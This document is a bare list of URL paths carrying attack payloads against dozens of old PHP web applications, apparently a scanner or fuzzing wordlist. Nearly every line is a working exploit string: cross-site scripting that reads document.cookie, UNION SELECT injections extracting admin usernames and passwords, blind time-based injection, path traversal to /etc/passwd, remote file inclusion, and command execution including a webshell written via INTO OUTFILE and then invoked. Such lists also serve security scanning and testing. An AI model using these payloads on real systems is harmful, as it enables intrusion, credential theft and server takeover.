/upcoming.php?public_must_be_enabled=true&public_access=Y
/forum%20aztek/forum_2.php?msg=10
/phorum5012/follow.php?forum_id=1&,f00=bar,1=waraxe
/phorum5012/follow.php?forum_id=1&thread=waraxe
/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
/message_send.php?tid=%22><script>alert(document.cookie)</script>
/message_send.php?quote=[ID]
/module=user&norm_user_op=login&block_username=%0d%0aContent-Length
/search.php?do_search=1&advanced=1&name=&email=&status=&sex=&year=&house=&room=&mailbox=&phone=%3Cscript%3Edocument.write%28document.cookie
/global.php?do_search=1&high_school=1&state=1&city=2&hsid=1&changed=1&advanced=1&high_school=1&name=%3Cscript%3Edocument.write%28document.c
/search.php?all_fields=0&do_search=1&advanced=1&group=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E
/pp13/index.php?index_page=and 1=1
/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss code here]
/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss code here]
/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss code here]
/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss code here]
/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1
/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]
/phpkit/popup.php?img="><script>alert(document.cookie)</script>
/phpkit/include.php?path=guestbook/print.php&id=1'
/index.php?file=Suggest&module=Links
/viewimg.php?path=images.d/face/../../../../../../../&form=Co
/<img src=javascript
/parser/parser.php?file=<script>alert(document.cookie)</script>
/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../etc/passwd
/battletorrent/btdownload.php?type=torrent&file=../../etc/passwd
/index.php?entry=<script>alert(document.cookie)</script>
/pafiledb/includes/admin/admins.php
/pafiledb/includes/admin/category.php
/pafiledb/includes/team.php
/bittorrent_module/btdownload.php?file=<script>alert(document.cookie)</script>
/bittorrent_module/btdownload.php?file=<img%20src=http
/bittorrent_module/btdownload.php?file=<iframe%20src=http
/bittorrent_module/btdownload.php?file=<form%20action="http
/phpgedview/descendancy.php?pid=<iframe>
/phpgedview/index.php?rootid="><iframe>
/phpgedview/individual.php?pid="><iframe>
/phpgedview/source.php?sid=<iframe>
/phpgedview/imageview.php?filename=<iframe>
/phpgedview/gedrecord.php?pid=<iframe>
/phpgedview/gdbi_interface.php?action=delete&pid=<iframe>
/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00
/sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00
/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));
/calendar.php?Cat=[XSS]
/login.php?Cat=[XSS]
/online.php?Cat=[XSS]
/phpgedview/login.php?url=/index.php?GEDCOM="><iframe>
/phpgedview/login.php?action=login&username="><iframe>
/phpgedview/login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>
/phpgedview/relationship.php?path_to_find="><iframe>
/phpgedview/relationship.php?path_to_find=0&pid1="><iframe>
/phpgedview/relationship.php?path_to_find=0&pid1=&pid2="><iframe>
/phpgedview/calendar.php?action=today&day=1&month=jan&year="><iframe>
/phpgedview/calendar.php?action=today&day=1&month=<iframe>
/phpgedview/calendar.php?action=today&day=<iframe>
/phpgedview/placelist.php?level=1[Evil_Query]
/phpgedview/placelist.php?level=1&parent[0]=[Evil_Query]
/phpgedview/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/phpgedview/timeline.php?pids=[Evil_Query]
/weblog/index.php?string=[sql injection code]
/phpgroupware/wiki/index.php?kp3=99884d8a63791f406585913d74476b11
/phpgroupware/index.php?menuaction=forum.uiforum.post&type=new%22
/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=202%22%
/phpgroupware/index.php?menuaction=forum.uiforum.read&forum_id=3%
/phpgroupware/index.php?menuaction=forum.uiforum.read&msg=42&pos=
/phpgroupware/index.php?menuaction=preferences.uicategories.index
/phpgroupware/index.php?menuaction=preferences.uicategories.edit&
/phpgroupware/index.php?menuaction=email.uimessage.message&msgbal
/phpgroupware/index.php?menuaction=email.uicompose.compose&fldbal
/phpgroupware/tts/viewticket_details.php?ticket_id=338%22%3E%3Cif
/phpgroupware/tts/viewticket_details.php?ticket_id=355[SQL_QUERY]
/phpgroupware/index.php?menuaction=todo.ui.show_list&order=[SQL_Q
/phpgroupware/index.php?menuaction=projects.uiprojects.list_proje
/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
/phpgroupware/index.php?menuaction=projects.uiprojects.edit_proje
/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
/phpgroupware/index.php?menuaction=projects.uiprojects.view_proje
/phpgroupware/index.php?menuaction=projects.uiprojecthours.view_h
/wp-admin/post.php?content=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/link-add.php?linkurl=[XSS]
/wp-admin/link-add.php?name=[XSS]
/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
/wp-admin/link-manager.php?order_by=[XSS]
/wp-admin/link-manager.php?cat_id=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
/wp-admin/moderation.php?action=update&item_approved=[XSS]
/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]
/modules.php?name=WorkBoard&file=project&project_id=
/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]
/modules.php?name=Work_Board&op=Task&task_id=
/index.php?_a=knowledgebase&_j=search&searchm=[CODEGOESHERE]
/index.php?_a=knowledgebase&_j=subcat&_i=[SQL]
/index.php?_a=knowledgebase&_j=rate&_i=[SQL]&type=no
/index.php?_a=knowledgebase&_j=questiondetails&_i=[SQL]
/index.php?_a=tickets&_m=viewmain&email22=blah@blah&ticketkey22=[
/index.php?_a=tickets&_m=viewmain&email22=[SQL]&ticketkey22= 
/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;-- 
/stats/login.php?login=%22%3E%3Ciframe%3E 
/users.php?do=docreate"
/endon/mod.php?action=[BLABLA]&module=[XSS]
/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/expo/index.php?action=view&id=2&module=<h1>Tes</h1> 
/index.php?a=pm&s='><script>alert(document.cookie)</script>
/index.php?a=members&l='><script>alert(document.cookie)</script>
/index.php?a='><script>alert(document.cookie)</script>
/index.php?a=post&s='><script>alert(document.cookie)</script>
/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
/index.php?a=cp&s='><script>alert(document.cookie)</script>
/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*
/mercuryboard/index.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201/*
/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here]
/modules/incontent/index.php?op=aff&option=0&url=../../. ./index.php
/modules/incontent/index.php?op=aff&optio n=0&url=../../../mainfile.php 
/fusion_forum/viewthread.php?forum_id=10000&forum_cat=100000&thread_id=2 
/xGB.php?act=admin&do=edit 
/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
/index.php?&language=<script>var%20test_variable=31
/index.php?&language=../../../../../../../../etc/passwd
/citrusdb/tools/index.php 
/nuke75/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=[xss code here]
/nuke75/modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=[xss code here] 
/citrusdb/tools/index.php?load=../../../../../../tmp/exploit.php
/contact_us.php?&name=1&email=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E 
/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM dcp5_members WHERE username=%27[username]
/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password, null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null, null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]
/comments.php?op=view&newsid=1&showpost="><h1>AttackerXSSvulnerable<!-- 
/index.php?a=forum&f='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?a=forum&f='><script>alert(document.cookie)</script> 
/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
/index.php?act=Question&id=1&orderby='&order=DESC&limit=10
/index.php?act=Answer&cid=1&id=1&offset='
/index.php?act=Search&code=01&search_item='
/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4 
/biborb/bibindex.php?mode=displaysearch&search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=ID
/to/biborb/index.php?mode=result&database_name=../config.php&action=Delete
/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
/zboard.php?
/skin/dir/view_image.php?
/zboard.php?id=link&page=ALBANIAN%
/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http
/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
/panews/includes/config.php?nst=http
/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
/panews/includes/config.php?nst=id 
/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search 
/search.php?s=<script language="javascript">alert("");</script> 
/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS] 
/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 
/home.php?do=del;id=%31%27%3E%0A[Javascript]%31%27%3E%0A = 1'> 
/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid
/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form
/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1
/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie>
/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3
/images/announce/nst.gif.php?nst=ls -la 
/cubecart/?"><script>alert(document.cookie);</script>
/cubecart/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
/cubecart/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
/cubecart/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p>/<body>
/cubecart/view_order.php?session=1"><script>alert(document.cookie);</script>
/cubecart/view_order.php?product=1"><script>alert(document.cookie);</script>
/cubecart/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
/cubecart/view_product.php?product=1"><script>alert(document.cookie);</script>
/cubecart/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
/cubecart/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
/cubecart/login.php?session="><script>alert(document.cookie);</script>
/cubecart/search.php?search=".,script.alert(document.cookie)</script>
/index.php?catid='cXIb8O3
/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_
/index.php?name=Downloads&req=search&query=&show=cXIb8O3
/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*
/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd 
/phpcoin/mod.php?mod=helpdesk&mode=new
/phpcoin/mod.php?mod=mail&mode=reset&w=user
/phpcoin/login.php?w=user&o=login&e=u
/pblang/sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=/home/public_html/pblang/db/members/[username] 
/profile.php?user=%3Ciframe%20src=http
/pblang/delpm.php?id=[PMID]&a=[Target user name] 
/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/Zip/divers.php?action=liste&liste=&desc=&pages=[XSS] 
/Zip/divers.php?action=liste&liste=[SQL CODE]
/Zip/divers.php?action =liste&liste=email&desc=[SQL CODE]&pages=1
/dforum/nav.php3?page=[code] 
/[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1
/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/*
/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/* 
/[dir]/inc/download_center_lite.inc.php?script_root=http
/phpWebLog/include/init.inc.php?G_PATH=http
/phpWebLog/backend/addons/links/index.php?PATH=http
/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript
/pafiledb.php?"><script>alert();</script>
/pafiledb.php?action="><script>alert();</script>
/pafiledb.php?[something]="><script>alert();</script>
/pafiledb.php?[something]=&[something]="><script>alert();</script> 
/zorum_3_5/index.php?list="/><script>alert()</script>
/zorum_3_5/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod="/><script>alert()</script> 
/photopost/adm-photo.php?ppaction=manipulate&pid=[IMAGE ID]&dowhat=rebuildthumb&dowhat=rotateccw 
/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a 
/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http
/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http
/[site-with-vote].php?vote=1" method="POST">
/[site-with-vote].php?vote=1" method="POST">
/simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 
/[phpAdsNew]/adframe.php?refresh=example.com'>[XSS code] 
//[CMD] 
/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http
/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http
/phpopenchat/contrib/yabbse/poc.php?sourcedir=http
/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http
/path/to/mcnews/admin/install.php?l=http
/index.php?categoryid=3&p17_sectionid=1&p17_imageid=[SQL code] 
/regulars.php">
/register.php">
/[runcms]/class/debug/highlight.php?file=[runcmsinstallationpath]\mainfile.php&line=151#151
/register.php?action=confirm&login='or 1=1 into outfile '/var/www/html/cf_users_with_magic_quotes_on.txt 
/setuser.php">
/ciamosinstalation/class/debug/highlight.php?file=ciamosinstallationpath\mainfile.php&line=151#151 
/trg_news30/trgnews/install/article.php?dir=http
/research/news/CzarNewsv113b/headlines.php?tpath=http
/index.php?_a=knowledgebase&_j=questiondetails&_i=[INT][XSS]
/index.php?_a=knowledgebase&_j=questionprint&_i=[INT][XSS]
/index.php?_a=troubleshooter&_c=[INT][XSS]
/index.php?_a=knowledgebase&_j=subcat&_i=[INT][XSS]
/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length
/index.php?act=http
/content.php?act=http
/articles/newcomment?ArticleId=">&lt;script&gt;alert('hi')&lt;/script&gt; 
/hive/base.php?page=forum/msg.php-afs-1-"/><script>alert()</script>1
/hive/base.php?page=membres.php&mt="/><script>alert()</script>1 
/[phpSysInfo]/index.php?sensor_program=[XSS] 
/[phpSysInfo]/includes/system_footer.php?text[language]=">[XSS]
/[phpSysInfo]/includes/system_footer.php?text[template]=">[XSS]
/[phpSysInfo]/includes/system_footer.php?hide_picklist=cXIb8O3&VERSION=[XSS] 
/forums/index.php?act=Msg&CODE=04&MODE=1&entered_name=Woody&msg_title=hi&Post=I%20love%20you!">
/phpbb/calendar_scheduler.php?start=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/main.php?menuAction=htmlTickets.show;system(id);ob_start 
/index.php?area=[XSS]
/index.php?p=articles&area=[SQL Code] 
/review.php?id=1&cat=&subcat="><script src=http
/hv/ecdis/pages.php?idpages='SQLINJECTION
/hv/ecdis/products1.php?id=6&id2='SQLINJECTION&subcat=Asus&p=products1 
/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 
/modules.php?name=Bookmarks&file=marks
/modules.php?name=Bookmarks&file=marks&category=1\' 
/modules.php?name=Bookmarks&file=del_cat&catname=[htmlcode]
/modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode]
/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode]
/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode]
/modules.php?name=Bookmarks&file=marks&catname=[htmlcode]
/modules.php?name=Bookmarks&file=uploadbookmarks&category=[htmlcode] 
/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script> 
/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai
/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EPops cookie
/modules/newbb/index.php?viewcat='SQL_INJECTION
/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9 
/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
/store/item.php?si d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION
/store/ search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
/store/search_result.php?sid= CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD 
/auxpage.php?page=../../../some/other/file 
/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value
/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d
/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=
/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser=
/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bpassword=&amp%3bsort=1&amp%3bcat=502
/photos/showmembers.php?sl='SQL_INJECTION
/photos/showphoto.php?photo='SQL_ERROR 
/index.php?page=http
/message.php">
/index.php?name=Your_Account&profile=anyone"><script>alert('foo')</script>
/coppermine/displayimage/meta=lastcom/cat=0"><script>alert('foo')</script>/pos=0.html 
/login.asp?msg=<script>alert(XSS)</script> 
/index.php?crn='SQL_INJECTION&action=show&show_products_mode=cat_click&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15 
/epal/index.php?view=http
/epal/?order_num=crap&payment=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&send=first&send=regular&send=priority&send=express
/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script>
/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> 
/usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/adminshop/index.php?proMod=index&amp%3bftoedit=..%2fshopincs%2fmaintopENG 
/[nuke_dir]/modules.php?name=Your_Account&op=mailpasswd&username=[XSS]
/[nuke_dir]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS] 
/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist&avatarcategory=[XSS] 
/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS]
/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS] we can
/[nuke_dir]/modules.php">
/[php-nuke]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS]
/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS]
/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS]
/[php-nuke]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS] 
/[php-nuke]/banners.php?op=EmailStats&name=sex&bid=[XSS] 
/[phpBB]/dlman.php?func=file_info&file_id='[SQL Injection] 
/[phpBB]/links.php?func=show&id='[SQL Injection] 
/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10 
/index.php?&PHPSESSID='
/tellafriend.php?&product='
/view_cart.php?add='
/view_product.php?product=' 
/[php-nuke]/modules.php?name=Web_Links&l_op=modifylinkrequestS&url='[SQL]
/[php-nuke]/modules.php?name=Web_Links&l_op=viewlink&orderby=[SQL]&min=[SQL]
/[php-nuke]/modules.php?name=Web_Links&l_op=search&query=sex&orderby=[SQL]&min=[SQL]&show=[SQL]
/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=[SQL]&ratetype=num 
/user.php?op=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
/admin.php?module=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480 
/auciton_software/index.php?read=arbitary_file
/auciton_software/index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
/auciton_software/faq.php?farea=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/auciton_software/index.php?a=listings&mode=1&order=name&cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=
/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/script%3E 
/[path]/view.php?l=default&id=3'%20OR%20'a'='a'/*
/samples/news.php?DIR=http
/order/orderwiz.php?v=1&aid=&c_code=[XSS] 
/order/orderwiz.php?v=1&aid=[XSS] 
/index.php?option=com_zoom&Itemid=39&catid=2+OR+1=1 
/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION 
/jportal/banner.php and try this
/index.php?p=catalog&parent=12&pg="><script>alert(document.domain);</script> 
/groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/index.php?c=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217 
/portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59 
/viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/index.php?site=http
/sphpblog/search.php?q=[XSS]
/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E
/sphpblog/search.php?q=<a href=http
/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 
/phpBB/moddb/mod.php?id='[SQL Injection] 
/phpBB/moddb/mod.php?id='>&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
/mvnforum/Search="><script>alert('XSS found here')</script> 
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0 
/lnkx/message.php?msg=[XSS] 
/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] 
/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] 
